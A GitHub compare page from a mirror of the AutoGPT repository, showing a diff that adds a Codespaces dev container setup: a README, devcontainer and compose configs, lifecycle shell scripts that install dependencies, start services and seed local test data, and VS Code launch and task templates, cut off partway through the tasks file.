mirror of
https://github.com/Significant-Gravitas/AutoGPT.git
synced 2026-02-11 15:25:16 -05:00
Compare commits
8 Commits
feat/copit
...
otto/secrt
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
6a40a29f13 | ||
|
|
fa8930da4c | ||
|
|
8c79e170e7 | ||
|
|
698dc45146 | ||
|
|
214ab25b3c | ||
|
|
4daa25e3dc | ||
|
|
7195f7e298 | ||
|
|
582754256e |
206
.devcontainer/platform/README.md
Normal file
206
.devcontainer/platform/README.md
Normal file
@@ -0,0 +1,206 @@
|
||||
# GitHub Codespaces for AutoGPT Platform
|
||||
|
||||
This dev container provides a complete development environment for the AutoGPT Platform, optimized for PR reviews.
|
||||
|
||||
## 🚀 Quick Start
|
||||
|
||||
1. **Open in Codespaces:**
|
||||
- Go to the repository on GitHub
|
||||
- Click **Code** → **Codespaces** → **Create codespace on dev**
|
||||
- Or click the badge: [](https://codespaces.new/Significant-Gravitas/AutoGPT?quickstart=1)
|
||||
|
||||
2. **Wait for setup** (~60 seconds with prebuild, ~5-10 min without)
|
||||
|
||||
3. **Start the servers:**
|
||||
```bash
|
||||
# Terminal 1
|
||||
make run-backend
|
||||
|
||||
# Terminal 2
|
||||
make run-frontend
|
||||
```
|
||||
|
||||
4. **Start developing!**
|
||||
- Frontend: `http://localhost:3000`
|
||||
- Login with: `test123@gmail.com` / `testpassword123`
|
||||
|
||||
## 🏗️ Architecture
|
||||
|
||||
**Dependencies run in Docker** (cached by prebuild):
|
||||
- PostgreSQL, Redis, RabbitMQ, Supabase Auth
|
||||
|
||||
**Backend & Frontend run natively** (not cached):
|
||||
- This ensures you're always running the current branch's code
|
||||
- Enables hot-reload during development
|
||||
- VS Code debugger can attach directly
|
||||
|
||||
## 📍 Available Services
|
||||
|
||||
| Service | URL | Notes |
|
||||
|---------|-----|-------|
|
||||
| Frontend | http://localhost:3000 | Next.js app |
|
||||
| REST API | http://localhost:8006 | FastAPI backend |
|
||||
| WebSocket | ws://localhost:8001 | Real-time updates |
|
||||
| Supabase | http://localhost:8000 | Auth & API gateway |
|
||||
| Supabase Studio | http://localhost:5555 | Database admin |
|
||||
| RabbitMQ | http://localhost:15672 | Queue management |
|
||||
|
||||
## 🔑 Test Accounts
|
||||
|
||||
| Email | Password | Role |
|
||||
|-------|----------|------|
|
||||
| test123@gmail.com | testpassword123 | Featured Creator |
|
||||
|
||||
The test account has:
|
||||
- Pre-created agents and workflows
|
||||
- Published store listings
|
||||
- Active agent executions
|
||||
- Reviews and ratings
|
||||
|
||||
## 🛠️ Development Commands
|
||||
|
||||
```bash
|
||||
# Navigate to platform directory (terminal starts here by default)
|
||||
cd autogpt_platform
|
||||
|
||||
# Start all services
|
||||
docker compose up -d
|
||||
|
||||
# Or just core services (DB, Redis, RabbitMQ)
|
||||
make start-core
|
||||
|
||||
# Run backend in dev mode (hot reload)
|
||||
make run-backend
|
||||
|
||||
# Run frontend in dev mode (hot reload)
|
||||
make run-frontend
|
||||
|
||||
# Run both backend and frontend
|
||||
# (Use VS Code's "Full Stack" launch config for debugging)
|
||||
|
||||
# Format code
|
||||
make format
|
||||
|
||||
# Run tests
|
||||
make test-data # Regenerate test data
|
||||
poetry run test # Backend tests (from backend/)
|
||||
pnpm test:e2e # E2E tests (from frontend/)
|
||||
```
|
||||
|
||||
## 🐛 Debugging
|
||||
|
||||
### VS Code Launch Configs
|
||||
|
||||
> **Note:** Launch and task configs are in `.devcontainer/vscode-templates/`.
|
||||
> To use them locally, copy to `.vscode/`:
|
||||
> ```bash
|
||||
> cp .devcontainer/vscode-templates/*.json .vscode/
|
||||
> ```
|
||||
> In Codespaces, core settings are auto-applied via devcontainer.json.
|
||||
|
||||
Press `F5` or use the Run and Debug panel:
|
||||
|
||||
- **Backend: Debug FastAPI** - Debug the REST API server
|
||||
- **Backend: Debug Executor** - Debug the agent executor
|
||||
- **Frontend: Debug Next.js** - Debug with browser DevTools
|
||||
- **Full Stack: Backend + Frontend** - Debug both simultaneously
|
||||
- **Tests: Run E2E Tests** - Run Playwright tests
|
||||
|
||||
### VS Code Tasks
|
||||
|
||||
Press `Ctrl+Shift+P` → "Tasks: Run Task":
|
||||
|
||||
- Start/Stop All Services
|
||||
- Run Migrations
|
||||
- Seed Test Data
|
||||
- View Docker Logs
|
||||
- Reset Database
|
||||
|
||||
## 📁 Project Structure
|
||||
|
||||
```text
|
||||
autogpt_platform/ # This folder
|
||||
├── .devcontainer/ # Codespaces/devcontainer config
|
||||
├── .vscode/ # VS Code settings
|
||||
├── backend/ # Python FastAPI backend
|
||||
│ ├── backend/ # Application code
|
||||
│ ├── test/ # Test files + data seeders
|
||||
│ └── migrations/ # Prisma migrations
|
||||
├── frontend/ # Next.js frontend
|
||||
│ ├── src/ # Application code
|
||||
│ └── e2e/ # Playwright E2E tests
|
||||
├── db/ # Supabase configuration
|
||||
├── docker-compose.yml # Service orchestration
|
||||
└── Makefile # Common commands
|
||||
```
|
||||
|
||||
## 🔧 Troubleshooting
|
||||
|
||||
### Services not starting?
|
||||
```bash
|
||||
# Check service status
|
||||
docker compose ps
|
||||
|
||||
# View logs
|
||||
docker compose logs -f
|
||||
|
||||
# Restart everything
|
||||
docker compose down && docker compose up -d
|
||||
```
|
||||
|
||||
### Database issues?
|
||||
```bash
|
||||
# Reset database (destroys all data)
|
||||
make reset-db
|
||||
|
||||
# Re-run migrations
|
||||
make migrate
|
||||
|
||||
# Re-seed test data
|
||||
make test-data
|
||||
```
|
||||
|
||||
### Port already in use?
|
||||
```bash
|
||||
# Check what's using the port
|
||||
lsof -i :3000
|
||||
|
||||
# Kill process (if safe)
|
||||
kill -9 <PID>
|
||||
```
|
||||
|
||||
### Can't login?
|
||||
- Ensure all services are running: `docker compose ps`
|
||||
- Check auth service: `docker compose logs auth`
|
||||
- Try seeding data again: `make test-data`
|
||||
|
||||
## 📝 Making Changes
|
||||
|
||||
### Backend Changes
|
||||
1. Edit files in `backend/backend/`
|
||||
2. If using `make run-backend`, changes auto-reload
|
||||
3. Run `poetry run format` before committing
|
||||
|
||||
### Frontend Changes
|
||||
1. Edit files in `frontend/src/`
|
||||
2. If using `make run-frontend`, changes auto-reload
|
||||
3. Run `pnpm format` before committing
|
||||
|
||||
### Database Schema Changes
|
||||
1. Edit `backend/schema.prisma`
|
||||
2. Run `poetry run prisma migrate dev --name your_migration`
|
||||
3. Run `poetry run prisma generate`
|
||||
|
||||
## 🔒 Environment Variables
|
||||
|
||||
Default environment variables are configured for local development. For production secrets, use GitHub Codespaces Secrets:
|
||||
|
||||
1. Go to GitHub Settings → Codespaces → Secrets
|
||||
2. Add secrets with names matching `.env` variables
|
||||
3. They'll be automatically available in your codespace
|
||||
|
||||
## 📚 More Resources
|
||||
|
||||
- [AutoGPT Platform Docs](https://docs.agpt.co)
|
||||
- [Codespaces Documentation](https://docs.github.com/en/codespaces)
|
||||
- [Dev Containers Spec](https://containers.dev)
|
||||
152
.devcontainer/platform/devcontainer.json
Normal file
152
.devcontainer/platform/devcontainer.json
Normal file
@@ -0,0 +1,152 @@
|
||||
{
|
||||
"name": "AutoGPT Platform",
|
||||
"dockerComposeFile": "docker-compose.devcontainer.yml",
|
||||
"service": "devcontainer",
|
||||
"workspaceFolder": "/workspaces/AutoGPT/autogpt_platform",
|
||||
"shutdownAction": "stopCompose",
|
||||
|
||||
// Features - Docker-in-Docker for full compose support
|
||||
"features": {
|
||||
"ghcr.io/devcontainers/features/docker-in-docker:2": {
|
||||
"dockerDashComposeVersion": "v2"
|
||||
},
|
||||
"ghcr.io/devcontainers/features/github-cli:1": {},
|
||||
"ghcr.io/devcontainers/features/node:1": {
|
||||
"version": "22",
|
||||
"nodeGypDependencies": true
|
||||
},
|
||||
"ghcr.io/devcontainers/features/python:1": {
|
||||
"version": "3.13",
|
||||
"installTools": true,
|
||||
"toolsToInstall": "flake8,autopep8,black,mypy,pytest,poetry"
|
||||
}
|
||||
},
|
||||
|
||||
// Lifecycle scripts - paths relative to repo root
|
||||
"onCreateCommand": "bash .devcontainer/platform/scripts/oncreate.sh",
|
||||
"postCreateCommand": "bash .devcontainer/platform/scripts/postcreate.sh",
|
||||
"postStartCommand": "bash .devcontainer/platform/scripts/poststart.sh",
|
||||
|
||||
// Port forwarding
|
||||
"forwardPorts": [
|
||||
3000, // Frontend
|
||||
8006, // REST API
|
||||
8001, // WebSocket
|
||||
8000, // Supabase Kong
|
||||
5432, // PostgreSQL
|
||||
6379, // Redis
|
||||
15672, // RabbitMQ Management
|
||||
5555 // Supabase Studio
|
||||
],
|
||||
|
||||
"portsAttributes": {
|
||||
"3000": { "label": "Frontend", "onAutoForward": "openBrowser" },
|
||||
"8006": { "label": "REST API", "onAutoForward": "notify" },
|
||||
"8001": { "label": "WebSocket", "onAutoForward": "silent" },
|
||||
"8000": { "label": "Supabase", "onAutoForward": "silent" },
|
||||
"5432": { "label": "PostgreSQL", "onAutoForward": "silent" },
|
||||
"6379": { "label": "Redis", "onAutoForward": "silent" },
|
||||
"15672": { "label": "RabbitMQ", "onAutoForward": "silent" },
|
||||
"5555": { "label": "Supabase Studio", "onAutoForward": "silent" }
|
||||
},
|
||||
|
||||
// VS Code customizations
|
||||
"customizations": {
|
||||
"vscode": {
|
||||
"settings": {
|
||||
// Python
|
||||
"python.defaultInterpreterPath": "${workspaceFolder}/backend/.venv/bin/python",
|
||||
"python.analysis.typeCheckingMode": "basic",
|
||||
"python.testing.pytestEnabled": true,
|
||||
"python.testing.pytestArgs": ["backend"],
|
||||
|
||||
// Formatting
|
||||
"[python]": {
|
||||
"editor.defaultFormatter": "ms-python.black-formatter",
|
||||
"editor.formatOnSave": true
|
||||
},
|
||||
"[typescript]": {
|
||||
"editor.defaultFormatter": "esbenp.prettier-vscode",
|
||||
"editor.formatOnSave": true
|
||||
},
|
||||
"[typescriptreact]": {
|
||||
"editor.defaultFormatter": "esbenp.prettier-vscode",
|
||||
"editor.formatOnSave": true
|
||||
},
|
||||
"[javascript]": {
|
||||
"editor.defaultFormatter": "esbenp.prettier-vscode",
|
||||
"editor.formatOnSave": true
|
||||
},
|
||||
|
||||
// Editor
|
||||
"editor.rulers": [88, 120],
|
||||
"editor.tabSize": 2,
|
||||
"files.trimTrailingWhitespace": true,
|
||||
|
||||
// Terminal
|
||||
"terminal.integrated.defaultProfile.linux": "bash",
|
||||
"terminal.integrated.cwd": "${workspaceFolder}",
|
||||
|
||||
// Git
|
||||
"git.autofetch": true,
|
||||
"git.enableSmartCommit": true,
|
||||
"git.openRepositoryInParentFolders": "always",
|
||||
|
||||
// Prisma
|
||||
"prisma.showPrismaDataPlatformNotification": false
|
||||
},
|
||||
|
||||
"extensions": [
|
||||
// Python
|
||||
"ms-python.python",
|
||||
"ms-python.vscode-pylance",
|
||||
"ms-python.black-formatter",
|
||||
"ms-python.isort",
|
||||
|
||||
// JavaScript/TypeScript
|
||||
"dbaeumer.vscode-eslint",
|
||||
"esbenp.prettier-vscode",
|
||||
"bradlc.vscode-tailwindcss",
|
||||
|
||||
// Database
|
||||
"Prisma.prisma",
|
||||
|
||||
// Testing
|
||||
"ms-playwright.playwright",
|
||||
|
||||
// GitHub
|
||||
"GitHub.vscode-pull-request-github",
|
||||
"GitHub.copilot",
|
||||
"github.vscode-github-actions",
|
||||
|
||||
// Utilities
|
||||
"eamodio.gitlens",
|
||||
"usernamehw.errorlens",
|
||||
"christian-kohler.path-intellisense",
|
||||
"mikestead.dotenv"
|
||||
]
|
||||
},
|
||||
|
||||
"codespaces": {
|
||||
"openFiles": [
|
||||
"README.md"
|
||||
]
|
||||
}
|
||||
},
|
||||
|
||||
// Environment variables
|
||||
"containerEnv": {
|
||||
"CODESPACES": "true",
|
||||
"POETRY_VIRTUALENVS_IN_PROJECT": "true"
|
||||
},
|
||||
|
||||
// Run as non-root for security
|
||||
"remoteUser": "vscode",
|
||||
|
||||
// Host requirements for performance
|
||||
"hostRequirements": {
|
||||
"cpus": 4,
|
||||
"memory": "8gb",
|
||||
"storage": "32gb"
|
||||
}
|
||||
}
|
||||
21
.devcontainer/platform/docker-compose.devcontainer.yml
Normal file
21
.devcontainer/platform/docker-compose.devcontainer.yml
Normal file
@@ -0,0 +1,21 @@
|
||||
# Standalone devcontainer service
|
||||
# The platform services (db, redis, etc.) are started from within
|
||||
# the container using docker compose commands in the lifecycle scripts.
|
||||
|
||||
services:
|
||||
devcontainer:
|
||||
image: mcr.microsoft.com/devcontainers/base:ubuntu-24.04
|
||||
volumes:
|
||||
# Mount the entire AutoGPT repo
|
||||
- ../..:/workspaces/AutoGPT:cached
|
||||
|
||||
# Keep container running
|
||||
command: sleep infinity
|
||||
|
||||
# Environment for development
|
||||
environment:
|
||||
- CODESPACES=true
|
||||
- POETRY_VIRTUALENVS_IN_PROJECT=true
|
||||
- POETRY_NO_INTERACTION=1
|
||||
- NEXT_TELEMETRY_DISABLED=1
|
||||
- DO_NOT_TRACK=1
|
||||
142
.devcontainer/platform/scripts/oncreate.sh
Executable file
142
.devcontainer/platform/scripts/oncreate.sh
Executable file
@@ -0,0 +1,142 @@
|
||||
#!/bin/bash
|
||||
# =============================================================================
|
||||
# ONCREATE SCRIPT - Runs during prebuild
|
||||
# =============================================================================
|
||||
# This script runs during the prebuild phase (GitHub Actions).
|
||||
# It caches everything that's safe to cache:
|
||||
# ✅ Dependency Docker images (postgres, redis, rabbitmq, etc.)
|
||||
# ✅ Python packages (poetry install)
|
||||
# ✅ Node packages (pnpm install)
|
||||
#
|
||||
# It does NOT build backend/frontend Docker images because those would
|
||||
# contain stale code from the prebuild branch, not the PR being reviewed.
|
||||
# =============================================================================
|
||||
|
||||
set -e # Exit on error
|
||||
set -x # Print commands for debugging
|
||||
|
||||
echo "🚀 Starting prebuild setup..."
|
||||
|
||||
# =============================================================================
|
||||
# Setup PATH for tools installed by devcontainer features
|
||||
# =============================================================================
|
||||
# Python feature installs pipx at /usr/local/py-utils/bin
|
||||
# Node feature installs nvm, node, pnpm at various locations
|
||||
export PATH="/usr/local/py-utils/bin:$PATH"
|
||||
|
||||
# Source nvm if available (Node feature uses nvm)
|
||||
export NVM_DIR="${NVM_DIR:-/usr/local/share/nvm}"
|
||||
if [ -s "$NVM_DIR/nvm.sh" ]; then
|
||||
. "$NVM_DIR/nvm.sh"
|
||||
fi
|
||||
|
||||
# =============================================================================
|
||||
# Verify and Install Poetry
|
||||
# =============================================================================
|
||||
echo "📦 Setting up Poetry..."
|
||||
|
||||
if command -v poetry &> /dev/null; then
|
||||
echo " Poetry already installed: $(poetry --version)"
|
||||
else
|
||||
echo " Installing Poetry via pipx..."
|
||||
if command -v pipx &> /dev/null; then
|
||||
pipx install poetry
|
||||
else
|
||||
echo " pipx not found, installing poetry via pip..."
|
||||
pip install --user poetry
|
||||
export PATH="$HOME/.local/bin:$PATH"
|
||||
fi
|
||||
fi
|
||||
|
||||
poetry --version || { echo "❌ Poetry installation failed"; exit 1; }
|
||||
|
||||
# =============================================================================
|
||||
# Verify and Install pnpm
|
||||
# =============================================================================
|
||||
echo "📦 Setting up pnpm..."
|
||||
|
||||
if command -v pnpm &> /dev/null; then
|
||||
echo " pnpm already installed: $(pnpm --version)"
|
||||
else
|
||||
echo " Installing pnpm via npm..."
|
||||
npm install -g pnpm
|
||||
fi
|
||||
|
||||
pnpm --version || { echo "❌ pnpm installation failed"; exit 1; }
|
||||
|
||||
# =============================================================================
|
||||
# Navigate to workspace
|
||||
# =============================================================================
|
||||
cd /workspaces/AutoGPT/autogpt_platform
|
||||
|
||||
# =============================================================================
|
||||
# Install Backend Dependencies
|
||||
# =============================================================================
|
||||
echo "📦 Installing backend dependencies..."
|
||||
|
||||
cd backend
|
||||
poetry install --no-interaction --no-ansi
|
||||
|
||||
# Generate Prisma client (schema only, no DB needed)
|
||||
echo "🔧 Generating Prisma client..."
|
||||
poetry run prisma generate || true
|
||||
poetry run gen-prisma-stub || true
|
||||
|
||||
cd ..
|
||||
|
||||
# =============================================================================
|
||||
# Install Frontend Dependencies
|
||||
# =============================================================================
|
||||
echo "📦 Installing frontend dependencies..."
|
||||
|
||||
cd frontend
|
||||
pnpm install --frozen-lockfile
|
||||
cd ..
|
||||
|
||||
# =============================================================================
|
||||
# Pull Dependency Docker Images
|
||||
# =============================================================================
|
||||
# Use docker compose pull to get exact versions from compose files
|
||||
# (single source of truth, no version drift)
|
||||
# =============================================================================
|
||||
echo "🐳 Pulling dependency Docker images..."
|
||||
|
||||
# Start Docker daemon if using docker-in-docker
|
||||
if [ -e /var/run/docker-host.sock ]; then
|
||||
sudo ln -sf /var/run/docker-host.sock /var/run/docker.sock || true
|
||||
fi
|
||||
|
||||
# Check if Docker is available
|
||||
if command -v docker &> /dev/null && docker info &> /dev/null; then
|
||||
# Pull images defined in docker-compose.yml (single source of truth)
|
||||
docker compose pull db redis rabbitmq kong auth || echo "⚠️ Some images may not have pulled"
|
||||
echo "✅ Dependency images pulled"
|
||||
else
|
||||
echo "⚠️ Docker not available during prebuild, images will be pulled on first start"
|
||||
fi
|
||||
|
||||
# =============================================================================
|
||||
# Copy environment files
|
||||
# =============================================================================
|
||||
echo "📄 Setting up environment files..."
|
||||
|
||||
cd /workspaces/AutoGPT/autogpt_platform
|
||||
|
||||
[ ! -f backend/.env ] && cp backend/.env.default backend/.env
|
||||
[ ! -f frontend/.env ] && cp frontend/.env.default frontend/.env
|
||||
[ ! -f .env ] && cp .env.default .env
|
||||
|
||||
# =============================================================================
|
||||
# Done!
|
||||
# =============================================================================
|
||||
echo ""
|
||||
echo "=============================================="
|
||||
echo "✅ PREBUILD COMPLETE"
|
||||
echo "=============================================="
|
||||
echo ""
|
||||
echo "Cached:"
|
||||
echo " ✅ Poetry $(poetry --version 2>/dev/null || echo '(check path)')"
|
||||
echo " ✅ pnpm $(pnpm --version 2>/dev/null || echo '(check path)')"
|
||||
echo " ✅ Python packages"
|
||||
echo " ✅ Node packages"
|
||||
echo ""
|
||||
131
.devcontainer/platform/scripts/postcreate.sh
Executable file
131
.devcontainer/platform/scripts/postcreate.sh
Executable file
@@ -0,0 +1,131 @@
|
||||
#!/bin/bash
|
||||
# =============================================================================
|
||||
# POSTCREATE SCRIPT - Runs after container creation
|
||||
# =============================================================================
|
||||
# This script runs once when a codespace is first created. It starts the
|
||||
# dependency services and prepares the environment for development.
|
||||
#
|
||||
# NOTE: Backend and Frontend run NATIVELY (not in Docker) to ensure you're
|
||||
# always running the current branch's code, not stale prebuild code.
|
||||
# =============================================================================
|
||||
|
||||
set -e # Exit on error
|
||||
|
||||
echo "🚀 Setting up your development environment..."
|
||||
|
||||
# Ensure PATH includes pipx binaries (where poetry is installed)
|
||||
export PATH="/usr/local/py-utils/bin:$PATH"
|
||||
|
||||
cd /workspaces/AutoGPT/autogpt_platform
|
||||
|
||||
# =============================================================================
|
||||
# Ensure Docker is available
|
||||
# =============================================================================
|
||||
if [ -e /var/run/docker-host.sock ]; then
|
||||
sudo ln -sf /var/run/docker-host.sock /var/run/docker.sock 2>/dev/null || true
|
||||
fi
|
||||
|
||||
# Wait for Docker to be ready
|
||||
echo "⏳ Waiting for Docker..."
|
||||
timeout 60 bash -c 'until docker info &>/dev/null; do sleep 1; done'
|
||||
echo "✅ Docker is ready"
|
||||
|
||||
# =============================================================================
|
||||
# Start Dependency Services ONLY
|
||||
# =============================================================================
|
||||
# We only start infrastructure deps in Docker.
|
||||
# Backend/Frontend run natively to use the current branch's code.
|
||||
# =============================================================================
|
||||
echo "🐳 Starting dependency services..."
|
||||
|
||||
# Start core dependencies (DB, Auth, Redis, RabbitMQ)
|
||||
docker compose up -d db redis rabbitmq kong auth
|
||||
|
||||
# Wait for PostgreSQL to be healthy
|
||||
echo "⏳ Waiting for PostgreSQL..."
|
||||
timeout 120 bash -c '
|
||||
until docker compose exec -T db pg_isready -U postgres &>/dev/null; do
|
||||
sleep 2
|
||||
echo " Waiting for database..."
|
||||
done
|
||||
'
|
||||
echo "✅ PostgreSQL is ready"
|
||||
|
||||
# Wait for Redis
|
||||
echo "⏳ Waiting for Redis..."
|
||||
timeout 60 bash -c 'until docker compose exec -T redis redis-cli ping &>/dev/null; do sleep 1; done'
|
||||
echo "✅ Redis is ready"
|
||||
|
||||
# Wait for RabbitMQ
|
||||
echo "⏳ Waiting for RabbitMQ..."
|
||||
timeout 90 bash -c 'until docker compose exec -T rabbitmq rabbitmq-diagnostics -q ping &>/dev/null; do sleep 2; done'
|
||||
echo "✅ RabbitMQ is ready"
|
||||
|
||||
# =============================================================================
|
||||
# Run Database Migrations
|
||||
# =============================================================================
|
||||
echo "🔄 Running database migrations..."
|
||||
|
||||
cd backend
|
||||
|
||||
# Run migrations
|
||||
poetry run prisma migrate deploy
|
||||
poetry run prisma generate
|
||||
poetry run gen-prisma-stub || true
|
||||
|
||||
cd ..
|
||||
|
||||
# =============================================================================
|
||||
# Seed Test Data (Minimal)
|
||||
# =============================================================================
|
||||
echo "🌱 Checking test data..."
|
||||
|
||||
cd backend
|
||||
|
||||
# Check if test data already exists (idempotent)
|
||||
if poetry run python -c "
|
||||
import asyncio
|
||||
from backend.data.db import prisma
|
||||
|
||||
async def check():
|
||||
await prisma.connect()
|
||||
count = await prisma.user.count()
|
||||
await prisma.disconnect()
|
||||
return count > 0
|
||||
|
||||
print('exists' if asyncio.run(check()) else 'empty')
|
||||
" 2>/dev/null | grep -q "exists"; then
|
||||
echo " Test data already exists, skipping seed"
|
||||
else
|
||||
echo " Running E2E test data creator..."
|
||||
poetry run python test/e2e_test_data.py || echo "⚠️ Test data seeding had issues (may be partial)"
|
||||
fi
|
||||
|
||||
cd ..
|
||||
|
||||
# =============================================================================
|
||||
# Print Welcome Message
|
||||
# =============================================================================
|
||||
echo ""
|
||||
echo "=============================================="
|
||||
echo "🎉 CODESPACE READY!"
|
||||
echo "=============================================="
|
||||
echo ""
|
||||
echo "📍 Services Running (Docker):"
|
||||
echo " PostgreSQL: localhost:5432"
|
||||
echo " Redis: localhost:6379"
|
||||
echo " RabbitMQ: localhost:5672 (mgmt: 15672)"
|
||||
echo " Supabase: localhost:8000"
|
||||
echo ""
|
||||
echo "🚀 Start Development:"
|
||||
echo " make run-backend # Start backend (localhost:8006)"
|
||||
echo " make run-frontend # Start frontend (localhost:3000)"
|
||||
echo ""
|
||||
echo " Or run both in separate terminals!"
|
||||
echo ""
|
||||
echo "🔑 Test Account:"
|
||||
echo " Email: test123@gmail.com"
|
||||
echo " Password: testpassword123"
|
||||
echo ""
|
||||
echo "📚 Full docs: .devcontainer/platform/README.md"
|
||||
echo ""
|
||||
44
.devcontainer/platform/scripts/poststart.sh
Executable file
44
.devcontainer/platform/scripts/poststart.sh
Executable file
@@ -0,0 +1,44 @@
|
||||
#!/bin/bash
|
||||
# =============================================================================
|
||||
# POSTSTART SCRIPT - Runs every time the codespace starts
|
||||
# =============================================================================
|
||||
# This script runs when:
|
||||
# 1. Codespace is first created (after postcreate)
|
||||
# 2. Codespace resumes from stopped state
|
||||
# 3. Codespace rebuilds
|
||||
#
|
||||
# It ensures dependency services are running. Backend/Frontend are run
|
||||
# manually by the developer for hot-reload during development.
|
||||
# =============================================================================
|
||||
|
||||
echo "🔄 Starting dependency services..."
|
||||
|
||||
cd /workspaces/AutoGPT/autogpt_platform || { echo "❌ Failed to cd to workspace"; exit 1; }
|
||||
|
||||
# Ensure Docker socket is available
|
||||
if [ -e /var/run/docker-host.sock ]; then
|
||||
sudo ln -sf /var/run/docker-host.sock /var/run/docker.sock 2>/dev/null || true
|
||||
fi
|
||||
|
||||
# Wait for Docker
|
||||
timeout 30 bash -c 'until docker info &>/dev/null; do sleep 1; done' || {
|
||||
echo "⚠️ Docker not available, services may need manual start"
|
||||
exit 0
|
||||
}
|
||||
|
||||
# Start only dependency services (not backend/frontend)
|
||||
docker compose up -d db redis rabbitmq kong auth
|
||||
|
||||
# Quick health check
|
||||
echo "⏳ Waiting for services..."
|
||||
sleep 5
|
||||
|
||||
if docker compose ps | grep -q "running"; then
|
||||
echo "✅ Dependency services are running"
|
||||
echo ""
|
||||
echo "🚀 Start development with:"
|
||||
echo " make run-backend # Terminal 1"
|
||||
echo " make run-frontend # Terminal 2"
|
||||
else
|
||||
echo "⚠️ Some services may not be running. Try: docker compose up -d"
|
||||
fi
|
||||
110
.devcontainer/platform/vscode-templates/launch.json
Normal file
110
.devcontainer/platform/vscode-templates/launch.json
Normal file
@@ -0,0 +1,110 @@
|
||||
{
|
||||
"version": "0.2.0",
|
||||
"configurations": [
|
||||
{
|
||||
"name": "Backend: Debug FastAPI",
|
||||
"type": "debugpy",
|
||||
"request": "launch",
|
||||
"module": "uvicorn",
|
||||
"args": [
|
||||
"backend.rest:app",
|
||||
"--reload",
|
||||
"--host", "0.0.0.0",
|
||||
"--port", "8006"
|
||||
],
|
||||
"cwd": "${workspaceFolder}/backend",
|
||||
"env": {
|
||||
"PYTHONPATH": "${workspaceFolder}/backend"
|
||||
},
|
||||
"console": "integratedTerminal",
|
||||
"justMyCode": false
|
||||
},
|
||||
{
|
||||
"name": "Backend: Debug Executor",
|
||||
"type": "debugpy",
|
||||
"request": "launch",
|
||||
"module": "backend.exec",
|
||||
"cwd": "${workspaceFolder}/backend",
|
||||
"env": {
|
||||
"PYTHONPATH": "${workspaceFolder}/backend"
|
||||
},
|
||||
"console": "integratedTerminal",
|
||||
"justMyCode": false
|
||||
},
|
||||
{
|
||||
"name": "Backend: Debug WebSocket",
|
||||
"type": "debugpy",
|
||||
"request": "launch",
|
||||
"module": "backend.ws",
|
||||
"cwd": "${workspaceFolder}/backend",
|
||||
"env": {
|
||||
"PYTHONPATH": "${workspaceFolder}/backend"
|
||||
},
|
||||
"console": "integratedTerminal",
|
||||
"justMyCode": false
|
||||
},
|
||||
{
|
||||
"name": "Frontend: Debug Next.js",
|
||||
"type": "node",
|
||||
"request": "launch",
|
||||
"runtimeExecutable": "pnpm",
|
||||
"runtimeArgs": ["dev"],
|
||||
"cwd": "${workspaceFolder}/frontend",
|
||||
"console": "integratedTerminal",
|
||||
"serverReadyAction": {
|
||||
"pattern": "- Local:.+(https?://\\S+)",
|
||||
"uriFormat": "%s",
|
||||
"action": "openExternally"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "Frontend: Debug Next.js (Server-side)",
|
||||
"type": "node",
|
||||
"request": "launch",
|
||||
"runtimeExecutable": "pnpm",
|
||||
"runtimeArgs": ["dev"],
|
||||
"cwd": "${workspaceFolder}/frontend",
|
||||
"env": {
|
||||
"NODE_OPTIONS": "--inspect"
|
||||
},
|
||||
"console": "integratedTerminal"
|
||||
},
|
||||
{
|
||||
"name": "Tests: Run Backend Tests",
|
||||
"type": "debugpy",
|
||||
"request": "launch",
|
||||
"module": "pytest",
|
||||
"args": ["-v", "--tb=short"],
|
||||
"cwd": "${workspaceFolder}/backend",
|
||||
"console": "integratedTerminal",
|
||||
"justMyCode": false
|
||||
},
|
||||
{
|
||||
"name": "Tests: Run E2E Tests (Playwright)",
|
||||
"type": "node",
|
||||
"request": "launch",
|
||||
"runtimeExecutable": "pnpm",
|
||||
"runtimeArgs": ["test:e2e"],
|
||||
"cwd": "${workspaceFolder}/frontend",
|
||||
"console": "integratedTerminal"
|
||||
},
|
||||
{
|
||||
"name": "Scripts: Seed Test Data",
|
||||
"type": "debugpy",
|
||||
"request": "launch",
|
||||
"program": "${workspaceFolder}/backend/test/e2e_test_data.py",
|
||||
"cwd": "${workspaceFolder}/backend",
|
||||
"env": {
|
||||
"PYTHONPATH": "${workspaceFolder}/backend"
|
||||
},
|
||||
"console": "integratedTerminal"
|
||||
}
|
||||
],
|
||||
"compounds": [
|
||||
{
|
||||
"name": "Full Stack: Backend + Frontend",
|
||||
"configurations": ["Backend: Debug FastAPI", "Frontend: Debug Next.js"],
|
||||
"stopAll": true
|
||||
}
|
||||
]
|
||||
}
|
||||
147
.devcontainer/platform/vscode-templates/tasks.json
Normal file
147
.devcontainer/platform/vscode-templates/tasks.json
Normal file
@@ -0,0 +1,147 @@
|
||||
{
|
||||
"version": "2.0.0",
|
||||
"tasks": [
|
||||
{
|
||||
"label": "Start All Services",
|
||||
"type": "shell",
|
||||
"command": "docker compose up -d",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}"
|
||||
},
|
||||
"problemMatcher": [],
|
||||
"group": "build"
|
||||
},
|
||||
{
|
||||
"label": "Stop All Services",
|
||||
"type": "shell",
|
||||
"command": "docker compose stop",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}"
|
||||
},
|
||||
"problemMatcher": []
|
||||
},
|
||||
{
|
||||
"label": "Start Core Services",
|
||||
"type": "shell",
|
||||
"command": "make start-core",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}"
|
||||
},
|
||||
"problemMatcher": [],
|
||||
"group": "build"
|
||||
},
|
||||
{
|
||||
"label": "Run Backend (Dev Mode)",
|
||||
"type": "shell",
|
||||
"command": "poetry run app",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}/backend"
|
||||
},
|
||||
"problemMatcher": [],
|
||||
"isBackground": true,
|
||||
"group": {
|
||||
"kind": "build",
|
||||
"isDefault": false
|
||||
}
|
||||
},
|
||||
{
|
||||
"label": "Run Frontend (Dev Mode)",
|
||||
"type": "shell",
|
||||
"command": "pnpm dev",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}/frontend"
|
||||
},
|
||||
"problemMatcher": [],
|
||||
"isBackground": true,
|
||||
"group": {
|
||||
"kind": "build",
|
||||
"isDefault": true
|
||||
}
|
||||
},
|
||||
{
|
||||
"label": "Run Migrations",
|
||||
"type": "shell",
|
||||
"command": "make migrate",
|
||||
"options": {
|
||||
"cwd": "${workspaceFolder}"
|
||||
},
|
||||
